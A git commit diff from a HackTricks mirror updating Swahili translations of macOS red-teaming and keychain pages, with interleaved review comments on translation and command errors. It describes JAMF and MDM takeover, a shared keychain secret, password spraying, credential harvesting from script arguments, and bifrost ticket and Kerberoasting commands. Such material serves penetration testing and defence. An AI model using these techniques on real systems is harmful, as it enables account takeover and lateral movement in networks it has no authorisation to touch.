mirror of https://github.com/carlospolop/hacktricks synced 2025-02-20 16:08:27 +00:00

Translated ['macos-hardening/macos-red-teaming/README.md', 'macos-harden

This commit is contained in:
Translator 2024-08-21 15:05:57 +00:00
parent 33841e49ba
commit 022f683fff
3 changed files with 309 additions and 182 deletions
macos-hardening
macos-red-teaming
macos-security-and-privilege-escalation/macos-files-folders-and-binaries


@ -1,69 +1,69 @@
# Kufanya Udukuzi wa Red Teaming kwenye macOS
# macOS Red Teaming
{% hint style="success" %}
Jifunze na zoea Udukuzi wa AWS:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**Mafunzo ya HackTricks kwa Wataalamu wa Timu Nyekundu ya AWS (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Jifunze na zoea Udukuzi wa GCP: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**Mafunzo ya HackTricks kwa Wataalamu wa Timu Nyekundu ya GCP (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
Learn & practice AWS Hacking:<img src="../../.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="../../.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary>Support HackTricks</summary>
* Angalia [**mpango wa usajili**](https://github.com/sponsors/carlospolop)!
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu za udukuzi kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
## Kutumia MDMs kwa Udukuzi
## Abusing MDMs
* JAMF Pro: `jamf checkJSSConnection`
* Kandji
Ikiwa unafanikiwa **kudukua vibali vya msimamizi** ili kupata upatikanaji wa jukwaa la usimamizi, unaweza **kudukua kompyuta zote** kwa kusambaza zisizo programu hasidi kwenye mashine.
Ikiwa utaweza **kudukua akauti za admin** ili kufikia jukwaa la usimamizi, unaweza **kudukua kompyuta zote** kwa kusambaza malware yako kwenye mashine.
Kwa red teaming katika mazingira ya MacOS, ni vyema kuwa na uelewa fulani wa jinsi MDMs zinavyofanya kazi:
Kwa red teaming katika mazingira ya MacOS, inashauriwa sana kuwa na ufahamu wa jinsi MDMs zinavyofanya kazi:
{% content-ref url="macos-mdm/" %}
[macos-mdm](macos-mdm/)
{% endcontent-ref %}
### Kutumia MDM kama C2
### Using MDM as a C2
MDM itakuwa na idhini ya kufunga, kuuliza au kuondoa maelezo, kufunga programu, kuunda akaunti za msimamizi wa ndani, kuweka nenosiri la firmware, kubadilisha ufunguo wa FileVault...
MDM itakuwa na ruhusa ya kufunga, kuuliza au kuondoa profaili, kufunga programu, kuunda akaunti za admin za ndani, kuweka nenosiri la firmware, kubadilisha ufunguo wa FileVault...
Ili kuendesha MDM yako mwenyewe unahitaji **CSR yako isainiwe na muuzaji** ambayo unaweza kujaribu kupata kwa kutumia [**https://mdmcert.download/**](https://mdmcert.download/). Na ili kuendesha MDM yako mwenyewe kwa vifaa vya Apple unaweza kutumia [**MicroMDM**](https://github.com/micromdm/micromdm).
Ili kuendesha MDM yako mwenyewe unahitaji **CSR yako isainiwe na muuzaji** ambayo unaweza kujaribu kupata na [**https://mdmcert.download/**](https://mdmcert.download/). Na ili kuendesha MDM yako mwenyewe kwa vifaa vya Apple unaweza kutumia [**MicroMDM**](https://github.com/micromdm/micromdm).
Hata hivyo, ili kufunga programu kwenye kifaa kilichojiandikisha, bado unahitaji iwe imesainiwa na akaunti ya mwandishi... hata hivyo, baada ya usajili wa MDM **kifaa huongeza cheti cha SSL cha MDM kama CA inayoweza kudhibitika**, hivyo sasa unaweza kusaini chochote.
Hata hivyo, ili kufunga programu kwenye kifaa kilichosajiliwa, bado unahitaji isainiwe na akaunti ya developer... hata hivyo, wakati wa usajili wa MDM **kifaa kinaongeza cheti cha SSL cha MDM kama CA inayotambulika**, hivyo sasa unaweza kusaini chochote.
Ili kujiandikisha kifaa kwenye MDM unahitaji kufunga faili ya **`mobileconfig`** kama root, ambayo inaweza kutolewa kupitia faili ya **pkg** (unaweza kuipachika kwenye zip na unapoidownload kutoka safari itaondolewa kwenye zip).
Ili kusajili kifaa katika MDM unahitaji kufunga **`mobileconfig`** faili kama root, ambayo inaweza kutolewa kupitia faili ya **pkg** (unaweza kuifunga katika zip na wakati inapakuliwa kutoka safari itafunguliwa).
**Mawakala wa Mythic Orthrus** hutumia mbinu hii.
**Mythic agent Orthrus** inatumia mbinu hii.
### Kutumia JAMF PRO vibaya
### Abusing JAMF PRO
JAMF inaweza kuendesha **maandishi ya desturi** (maandishi yaliyotengenezwa na msimamizi wa mfumo), **mizigo ya asili** (uundaji wa akaunti za ndani, kuweka nenosiri la EFI, ufuatiliaji wa faili/mchakato...) na **MDM** (mipangilio ya kifaa, vyeti vya kifaa...).
JAMF inaweza kuendesha **scripts za kawaida** (scripts zilizotengenezwa na sysadmin), **payloads za asili** (kuunda akaunti za ndani, kuweka nenosiri la EFI, ufuatiliaji wa faili/mchakato...) na **MDM** (mipangilio ya kifaa, vyeti vya kifaa...).
#### Usajili wa kujisajili wa JAMF
#### JAMF self-enrolment
Nenda kwenye ukurasa kama vile `https://<jina-la-kampuni>.jamfcloud.com/enroll/` kuona ikiwa wana **ruhusa ya kujisajili wenyewe**. Ikiwa wana inaweza **kuomba vibali vya kupata**.
Nenda kwenye ukurasa kama `https://<company-name>.jamfcloud.com/enroll/` kuona kama wana **self-enrolment enabled**. Ikiwa wanaweza **kuomba akauti za kufikia**.
Unaweza kutumia maandishi [**JamfSniper.py**](https://github.com/WithSecureLabs/Jamf-Attack-Toolkit/blob/master/JamfSniper.py) kufanya shambulio la kunyunyizia nenosiri.
Unaweza kutumia script [**JamfSniper.py**](https://github.com/WithSecureLabs/Jamf-Attack-Toolkit/blob/master/JamfSniper.py) kufanya shambulio la password spraying.
Zaidi ya hayo, baada ya kupata vibali sahihi unaweza kuwa na uwezo wa kuvunja nguvu majina mengine ya mtumiaji na fomu ifuatayo:
Zaidi ya hayo, baada ya kupata akauti sahihi unaweza kuwa na uwezo wa kujaribu nguvu majina mengine ya watumiaji kwa fomu ifuatayo:
![](<../../.gitbook/assets/image (107).png>)
#### Uthibitishaji wa Kifaa cha JAMF
#### JAMF device Authentication
<figure><img src="../../.gitbook/assets/image (167).png" alt=""><figcaption></figcaption></figure>
Faili ya **`jamf`** iliyomo siri ya kufungua keychain ambayo wakati wa ugunduzi ilikuwa **inashirikiwa** na kila mtu na ilikuwa: **`jk23ucnq91jfu9aj`**.\
Zaidi ya hayo, jamf **inaendelea** kama **LaunchDaemon** katika **`/Library/LaunchAgents/com.jamf.management.agent.plist`**
**`jamf`** binary ilikuwa na siri ya kufungua keychain ambayo wakati wa ugunduzi ilikuwa **shirikishi** kati ya kila mtu na ilikuwa: **`jk23ucnq91jfu9aj`**.\
Zaidi ya hayo, jamf **persist** kama **LaunchDaemon** katika **`/Library/LaunchAgents/com.jamf.management.agent.plist`**
#### Kuchukua Udhibiti wa Kifaa cha JAMF
#### JAMF Device Takeover
URL ya **JSS** (Jamf Software Server) ambayo **`jamf`** itatumia iko katika **`/Library/Preferences/com.jamfsoftware.jamf.plist`**.\
**JSS** (Jamf Software Server) **URL** ambayo **`jamf`** itatumia iko katika **`/Library/Preferences/com.jamfsoftware.jamf.plist`**.\
Faili hii kimsingi ina URL:
```bash
plutil -convert xml1 -o - /Library/Preferences/com.jamfsoftware.jamf.plist
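Review bot: the persistence line ("jamf **persist** kama **LaunchDaemon** katika **`/Library/LaunchAgents/com.jamf.management.agent.plist`**") labels the plist a LaunchDaemon while the path it gives is under `/Library/LaunchAgents`, which holds LaunchAgents (LaunchDaemons live under `/Library/LaunchDaemons`); the mismatch is carried over from the previous version, so either the label or the path should be corrected rather than re-translated as is. On style, the new version leaves several headings in English ("macOS Red Teaming", "Abusing MDMs", "Using MDM as a C2", "Abusing JAMF PRO", "JAMF self-enrolment") while the body is in Swahili, whereas the previous version translated them; pick one convention for headings across the file.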
@ -79,7 +79,9 @@ plutil -convert xml1 -o - /Library/Preferences/com.jamfsoftware.jamf.plist
```
{% endcode %}
Kwa hivyo, mshambuliaji anaweza kuweka pakiti ya madhara (`pkg`) ambayo **inaandika upya faili hii** wakati inapowekwa kwa kuweka **URL kwa msikilizaji wa Mythic C2 kutoka kwa wakala wa Typhon** sasa kuweza kutumia JAMF kama C2.
Hivyo, mshambuliaji anaweza kuweka kifurushi kibaya (`pkg`) ambacho **kinabadilisha faili hii** wakati wa usakinishaji na kuweka **URL kwa mskivu wa Mythic C2 kutoka kwa wakala wa Typhon** ili sasa aweze kutumia JAMF kama C2.
{% code overflow="wrap" %}
```bash
# After changing the URL you could wait for it to be reloaded or execute:
sudo jamf policy -id 0
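Review bot: "mskivu" in "URL kwa mskivu wa Mythic C2" is not a Swahili word for a listener; the previous version's "msikilizaji" was correct and should be kept.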
@ -88,28 +90,28 @@ sudo jamf policy -id 0
```
{% endcode %}
#### Uigizaji wa JAMF
#### JAMF Ujumbe wa Kuingilia
Ili **kuiga mawasiliano** kati ya kifaa na JMF unahitaji:
* **UUID** ya kifaa: `ioreg -d2 -c IOPlatformExpertDevice | awk -F" '/IOPlatformUUID/{print $(NF-1)}'`
* **Kifunguo cha JAMF** kutoka: `/Library/Application\ Support/Jamf/JAMF.keychain` ambayo ina cheti cha kifaa
* **JAMF keychain** kutoka: `/Library/Application\ Support/Jamf/JAMF.keychain` ambayo ina cheti cha kifaa
Ukiwa na habari hizi, **unda VM** na **UUID iliyoporwa** ya Vifaa na **SIP imelemazwa**, achia **Kifunguo cha JAMF,** **unganishe** agizo la Jamf na ibebe habari zake.
Kwa habari hii, **unda VM** yenye **stolen** Hardware **UUID** na **SIP disabled**, weka **JAMF keychain,** **hook** agent wa Jamf na uibe habari zake.
#### Uibaji wa Siri
#### Kuiba Siri
<figure><img src="../../.gitbook/assets/image (1025).png" alt=""><figcaption><p>a</p></figcaption></figure>
Unaweza pia kufuatilia eneo `/Library/Application Support/Jamf/tmp/` kwa **maandishi ya desturi** ambayo wasimamizi wanaweza kutaka kutekeleza kupitia Jamf kwani yanawekwa hapa, kutekelezwa na kuondolewa. Maandishi haya **yanaweza kuwa na siri**.
Unaweza pia kufuatilia eneo `/Library/Application Support/Jamf/tmp/` kwa ajili ya **custom scripts** ambao wasimamizi wanaweza kutaka kutekeleza kupitia Jamf kwani **zimewekwa hapa, zinatekelezwa na kuondolewa**. Scripts hizi **zinaweza kuwa na credentials**.
Hata hivyo, **siri** inaweza kupitishwa kupitia maandishi haya kama **parameta**, hivyo unahitaji kufuatilia `ps aux | grep -i jamf` (bila hata kuwa na mizizi).
Hata hivyo, **credentials** zinaweza kupitishwa kwa scripts hizi kama **parameters**, hivyo unahitaji kufuatilia `ps aux | grep -i jamf` (bila hata kuwa root).
Skripti [**JamfExplorer.py**](https://github.com/WithSecureLabs/Jamf-Attack-Toolkit/blob/master/JamfExplorer.py) inaweza kusikiliza faili mpya zinazoongezwa na hoja mpya za mchakato.
Script [**JamfExplorer.py**](https://github.com/WithSecureLabs/Jamf-Attack-Toolkit/blob/master/JamfExplorer.py) inaweza kusikiliza kwa faili mpya zinazoongezwa na hoja mpya za mchakato.
### Upatikanaji wa Mbali wa macOS
### macOS Ufikiaji wa Kijijini
Na pia kuhusu **itifaki** za **mtandao** za **"maalum" za MacOS**:
Na pia kuhusu **MacOS** "maalum" **network** **protocols**:
{% content-ref url="../macos-security-and-privilege-escalation/macos-protocols.md" %}
[macos-protocols.md](../macos-security-and-privilege-escalation/macos-protocols.md)
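Review bot: the UUID command `ioreg -d2 -c IOPlatformExpertDevice | awk -F" '/IOPlatformUUID/{print $(NF-1)}'` contains an unterminated double quote: `-F"` opens a quoted string that never closes, so the shell will not run it as written. The intent is to make awk split on the quote character, which needs the escaped form `-F\"` (or `-F'"'`); the backslash was probably lost in the markdown. Two translation points in the same hunk: the heading "JAMF Ujumbe wa Kuingilia" ("intrusion message") mistranslates "Impersonation", where the previous "Uigizaji wa JAMF" was closer, and "macOS Ufikiaji wa Kijijini" ("kijijini" means "in the village") should stay "Ufikiaji wa Mbali wa macOS" as before. "JMF" in "kati ya kifaa na JMF" is a typo for JAMF in both versions.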
@ -117,7 +119,7 @@ Na pia kuhusu **itifaki** za **mtandao** za **"maalum" za MacOS**:
## Active Directory
Katika baadhi ya matukio utagundua kuwa **kompyuta ya MacOS imeunganishwa na AD**. Katika hali hii unapaswa kujaribu **kuorodhesha** active directory kama ulivyoizoea. Pata **msaada** katika kurasa zifuatazo:
Katika hali fulani utaona kuwa **kompyuta ya MacOS imeunganishwa na AD**. Katika hali hii unapaswa kujaribu **kuorodhesha** active directory kama unavyozoea. Pata **msaada** katika kurasa zifuatazo:
{% content-ref url="../../network-services-pentesting/pentesting-ldap.md" %}
[pentesting-ldap.md](../../network-services-pentesting/pentesting-ldap.md)
@ -131,33 +133,36 @@ Katika baadhi ya matukio utagundua kuwa **kompyuta ya MacOS imeunganishwa na AD*
[pentesting-kerberos-88](../../network-services-pentesting/pentesting-kerberos-88/)
{% endcontent-ref %}
Zana ya **lokalini ya MacOS** ambayo inaweza pia kukusaidia ni `dscl`:
Zana **za ndani za MacOS** ambazo zinaweza pia kukusaidia ni `dscl`:
```bash
dscl "/Active Directory/[Domain]/All Domains" ls /
```
Pia kuna zana zilizoandaliwa kwa MacOS kwa kuchunguza moja kwa moja AD na kucheza na kerberos:
Pia kuna zana zilizotayarishwa kwa MacOS ili kuhesabu moja kwa moja AD na kucheza na kerberos:
* [**Machound**](https://github.com/XMCyber/MacHound): MacHound ni nyongeza ya zana ya ukaguzi wa Bloodhound inayoruhusu kukusanya na kuingiza mahusiano ya Active Directory kwenye mwenyeji wa MacOS.
* [**Bifrost**](https://github.com/its-a-feature/bifrost): Bifrost ni mradi wa Objective-C ulioundwa kuingiliana na APIs za Heimdal krb5 kwenye macOS. Lengo la mradi huu ni kuwezesha upimaji bora wa usalama kuhusu Kerberos kwenye vifaa vya macOS kwa kutumia APIs za asili bila kuhitaji mfumo mwingine au pakiti yoyote kwenye lengo.
* [**Orchard**](https://github.com/its-a-feature/Orchard): Zana ya JavaScript for Automation (JXA) kufanya uchunguzi wa Active Directory.
* [**Machound**](https://github.com/XMCyber/MacHound): MacHound ni nyongeza kwa zana ya ukaguzi ya Bloodhound inayoruhusu kukusanya na kuingiza uhusiano wa Active Directory kwenye mwenyeji wa MacOS.
* [**Bifrost**](https://github.com/its-a-feature/bifrost): Bifrost ni mradi wa Objective-C ulioandaliwa ili kuingiliana na Heimdal krb5 APIs kwenye macOS. Lengo la mradi ni kuwezesha upimaji bora wa usalama kuhusiana na Kerberos kwenye vifaa vya macOS kwa kutumia APIs za asili bila kuhitaji mfumo mwingine wowote au pakiti kwenye lengo.
* [**Orchard**](https://github.com/its-a-feature/Orchard): Zana ya JavaScript kwa Utaftaji (JXA) kufanya hesabu ya Active Directory.
### Taarifa za Kikoa
```bash
echo show com.apple.opendirectoryd.ActiveDirectory | scutil
```
### Watumiaji
### Users
Aina tatu za watumiaji wa MacOS ni:
- **Watumiaji wa Ndani** - Wanasimamiwa na huduma ya OpenDirectory ya ndani, hawajaunganishwa kwa njia yoyote na Active Directory.
- **Watumiaji wa Mtandao** - Watumiaji wa Active Directory wa muda wanaohitaji kuunganishwa kwa seva ya DC ili kuthibitisha.
- **Watumiaji wa Simu** - Watumiaji wa Active Directory wenye nakala rudufu ya ndani kwa ajili ya vitambulisho vyao na faili zao.
* **Local Users** — Inasimamiwa na huduma ya OpenDirectory ya ndani, hawajashikamana kwa njia yoyote na Active Directory.
* **Network Users** — Watumiaji wa Active Directory wanaobadilika ambao wanahitaji muunganisho na seva ya DC ili kuthibitisha.
* **Mobile Users** — Watumiaji wa Active Directory wenye nakala ya ndani ya hati zao na faili.
Maelezo ya ndani kuhusu watumiaji na vikundi hufanywa katika folda _/var/db/dslocal/nodes/Default._ Kwa mfano, maelezo kuhusu mtumiaji anayeitwa _mark_ hufanywa katika _/var/db/dslocal/nodes/Default/users/mark.plist_ na maelezo kuhusu kikundi _admin_ yapo katika _/var/db/dslocal/nodes/Default/groups/admin.plist_.
Taarifa za ndani kuhusu watumiaji na vikundi zinaifadhiwa katika folda _/var/db/dslocal/nodes/Default._\
Kwa mfano, taarifa kuhusu mtumiaji anayeitwa _mark_ zinaifadhiwa katika _/var/db/dslocal/nodes/Default/users/mark.plist_ na taarifa kuhusu kundi _admin_ ziko katika _/var/db/dslocal/nodes/Default/groups/admin.plist_.
Mbali na kutumia HasSession na AdminTo edges, **MacHound huongeza makali matatu mapya** kwenye database ya Bloodhound:
Mbali na kutumia edges za HasSession na AdminTo, **MacHound inaongeza edges tatu mpya** kwenye hifadhidata ya Bloodhound:
- **InawezaSSH** - kifaa kinachoruhusiwa kufanya SSH kwa mwenyeji
- **InawezaVNC** - kifaa kinachoruhusiwa kufanya VNC kwa mwenyeji
- **InawezaAE** - kifaa kinachoruhusiwa kutekeleza skripti za AppleEvent kwenye mwenyeji
* **CanSSH** - chombo kinachoruhusiwa SSH kwa mwenyeji
* **CanVNC** - chombo kinachoruhusiwa VNC kwa mwenyeji
* **CanAE** - chombo kinachoruhusiwa kutekeleza scripts za AppleEvent kwenye mwenyeji
```bash
#User enumeration
dscl . ls /Users
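Review bot: "Zana ya JavaScript kwa Utaftaji (JXA)" translates the product name "JavaScript for Automation" as "JavaScript for Searching"; the name should be left untranslated since JXA is the proper noun being expanded. Smaller points: "zinaifadhiwa" should be "zinahifadhiwa" (twice in the _/var/db/dslocal/nodes/Default_ paragraph); the new user-type bullets use an em-dash ("**Local Users** — ...") while the MacHound edge bullets a few lines down use a hyphen ("**CanSSH** - ..."), so the list separator is inconsistent within one section; and "Zana **za ndani za MacOS** ambazo zinaweza" is plural for a sentence that names a single tool, `dscl`, where the previous singular "Zana ya lokalini" agreed with it.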
@ -179,11 +184,42 @@ dscl "/Active Directory/TEST/All Domains" read "/Groups/[groupname]"
#Domain Information
dsconfigad -show
```
More info in [https://its-a-feature.github.io/posts/2018/01/Active-Directory-Discovery-with-a-Mac/](https://its-a-feature.github.io/posts/2018/01/Active-Directory-Discovery-with-a-Mac/)
Zaidi ya habari katika [https://its-a-feature.github.io/posts/2018/01/Active-Directory-Discovery-with-a-Mac/](https://its-a-feature.github.io/posts/2018/01/Active-Directory-Discovery-with-a-Mac/)
## Kupata Ufikiaji wa Keychain
### Computer$ password
Keychain ina uwezekano mkubwa wa kuwa na habari nyeti ambazo zikipatikana bila kutoa ombi la kuthibitisha zinaweza kusaidia katika kuendeleza zoezi la timu nyekundu:
Pata nywila kwa kutumia:
```bash
bifrost --action askhash --username [name] --password [password] --domain [domain]
```
Inawezekana kufikia nenosiri la **`Computer$`** ndani ya mfumo wa keychain.
### Over-Pass-The-Hash
Pata TGT kwa mtumiaji na huduma maalum:
```bash
bifrost --action asktgt --username [user] --domain [domain.com] \
--hash [hash] --enctype [enctype] --keytab [/path/to/keytab]
```
Mara tu TGT imekusanywa, inawezekana kuingiza katika kikao cha sasa kwa:
```bash
bifrost --action asktgt --username test_lab_admin \
--hash CF59D3256B62EE655F6430B0F80701EE05A0885B8B52E9C2480154AFA62E78 \
--enctype aes256 --domain test.lab.local
```
### Kerberoasting
```bash
bifrost --action asktgs --spn [service] --domain [domain.com] \
--username [user] --hash [hash] --enctype [enctype]
```
Kwa tiketi za huduma zilizopatikana, inawezekana kujaribu kufikia sehemu katika kompyuta nyingine:
```bash
smbutil view //computer.fqdn
mount -t smbfs //server/folder /local/mount/point
```
## Kufikia Keychain
Keychain ina uwezekano mkubwa kuwa na taarifa nyeti ambazo ikiwa zitafikiwa bila kuunda kichocheo zinaweza kusaidia kuendeleza zoezi la red team:
{% content-ref url="macos-keychain.md" %}
[macos-keychain.md](macos-keychain.md)
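Review bot: the sentence "Mara tu TGT imekusanywa, inawezekana kuingiza katika kikao cha sasa kwa:" says the next command injects the ticket into the current session, but the command that follows is another `bifrost --action asktgt ...` invocation, the same request action as the block just above it; `asktgt` only requests a TGT, so either the lead-in should describe it as a concrete request example or the block should show the separate ticket-import step. Also, "Inawezekana kufikia nenosiri la **`Computer$`** ndani ya mfumo wa keychain" sits after the `askhash` command and reads as its output; it is the section's lead-in and belongs before "Pata nywila kwa kutumia:". Minor: "Zaidi ya habari katika" should be "Taarifa zaidi katika".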
@ -191,13 +227,13 @@ Keychain ina uwezekano mkubwa wa kuwa na habari nyeti ambazo zikipatikana bila k
## Huduma za Nje
Kuunda Timu Nyekundu ya MacOS ni tofauti na Timu Nyekundu ya kawaida ya Windows kwa kawaida **MacOS imeunganishwa na majukwaa kadhaa ya nje moja kwa moja**. Mazingira ya kawaida ya MacOS ni kupata kompyuta kwa kutumia **sifa zilizosawazishwa za OneLogin, na kupata huduma kadhaa za nje** (kama vile github, aws...) kupitia OneLogin.
MacOS Red Teaming ni tofauti na Red Teaming ya kawaida ya Windows kwani kawaida **MacOS imeunganishwa na majukwaa kadhaa ya nje moja kwa moja**. Mipangilio ya kawaida ya MacOS ni kufikia kompyuta kwa kutumia **OneLogin credentials zilizoratibiwa, na kufikia huduma kadhaa za nje** (kama github, aws...) kupitia OneLogin.
## Mbinu za Timu Nyekundu za Kitaalam
## Mbinu Mbalimbali za Red Team
### Safari
Wakati faili inapakuliwa kwenye Safari, ikiwa ni faili "salama", ita **funguliwa moja kwa moja**. Kwa mfano, ikiwa **unapakua zip**, itafunguliwa moja kwa moja:
Wakati faili inapopakuliwa katika Safari, ikiwa ni faili "salama", itafunguliwa **automatically**. Hivyo kwa mfano, ikiwa **unapakua zip**, itafunguliwa moja kwa moja:
<figure><img src="../../.gitbook/assets/image (226).png" alt=""><figcaption></figcaption></figure>
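Review bot: "itafunguliwa **automatically**" leaves the English word inside a Swahili sentence; the previous "moja kwa moja", which the same sentence already uses a few words later, should be used in both places.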
@ -210,16 +246,16 @@ Wakati faili inapakuliwa kwenye Safari, ikiwa ni faili "salama", ita **funguliwa
* [**OBTS v3.0: "An Attackers Perspective on Jamf Configurations" - Luke Roberts / Calum Hall**](https://www.youtube.com/watch?v=ju1IYWUv4ZA)
{% hint style="success" %}
Jifunze & zoezi Hacking ya AWS:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**Mafunzo ya HackTricks ya Mtaalam wa Timu Nyekundu ya AWS (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Jifunze & zoezi Hacking ya GCP: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**Mafunzo ya HackTricks ya Mtaalam wa Timu Nyekundu ya GCP (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
Learn & practice AWS Hacking:<img src="../../.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="../../.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary>Support HackTricks</summary>
* Angalia [**mpango wa michango**](https://github.com/sponsors/carlospolop)!
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu za udukuzi kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}


@ -1,16 +1,16 @@
# macOS Keychain
{% hint style="success" %}
Jifunze na zoezi la Udukuzi wa AWS:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**Mafunzo ya HackTricks ya Mtaalam wa Timu Nyekundu ya AWS (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Jifunze na zoezi la Udukuzi wa GCP: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**Mafunzo ya HackTricks ya Mtaalam wa Timu Nyekundu ya GCP (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
Learn & practice AWS Hacking:<img src="../../.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="../../.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary>Support HackTricks</summary>
* Angalia [**mpango wa michango**](https://github.com/sponsors/carlospolop)!
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu za udukuzi kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
@ -19,69 +19,72 @@ Jifunze na zoezi la Udukuzi wa GCP: <img src="/.gitbook/assets/grte.png" alt=""
<figure><img src="../../.gitbook/assets/image (1227).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) ni injini ya utaftaji inayotumia **dark-web** ambayo inatoa huduma za **bure** za kuangalia ikiwa kampuni au wateja wake wameathiriwa na **malware za wizi**.
[**WhiteIntel**](https://whiteintel.io) ni injini ya utafutaji inayotumiwa na **dark-web** ambayo inatoa kazi za **bure** kuangalia kama kampuni au wateja wake wamekuwa **compromised** na **stealer malwares**.
Lengo kuu la WhiteIntel ni kupambana na utekaji wa akaunti na mashambulio ya ransomware yanayotokana na malware za kuiba habari.
Lengo lao kuu la WhiteIntel ni kupambana na utekaji wa akaunti na mashambulizi ya ransomware yanayotokana na malware inayopora taarifa.
Unaweza kutembelea tovuti yao na kujaribu injini yao **bure** hapa:
Unaweza kuangalia tovuti yao na kujaribu injini yao kwa **bure** kwenye:
{% embed url="https://whiteintel.io" %}
***
## Keychains Kuu
## Main Keychains
* **Keychain ya Mtumiaji** (`~/Library/Keychains/login.keycahin-db`), ambayo hutumika kuhifadhi **siri maalum za mtumiaji** kama nywila za programu, nywila za mtandao, vyeti vilivyoundwa na mtumiaji, nywila za mtandao, na funguo za umma/binafsi zilizoundwa na mtumiaji.
* **Keychain ya Mfumo** (`/Library/Keychains/System.keychain`), ambayo hifadhi **siri za mfumo kwa ujumla** kama vile nywila za WiFi, vyeti vya msingi vya mfumo, funguo binafsi za mfumo, na nywila za programu za mfumo.
* **User Keychain** (`~/Library/Keychains/login.keycahin-db`), ambayo inatumika kuhifadhi **credentials za mtumiaji** kama vile nywila za programu, nywila za mtandao, vyeti vilivyoundwa na mtumiaji, nywila za mtandao, na funguo za umma/za faragha zilizoundwa na mtumiaji.
* **System Keychain** (`/Library/Keychains/System.keychain`), ambayo inahifadhi **credentials za mfumo mzima** kama vile nywila za WiFi, vyeti vya mfumo wa mizizi, funguo za faragha za mfumo, na nywila za programu za mfumo.
### Upatikanaji wa Keychain ya Nywila
### Password Keychain Access
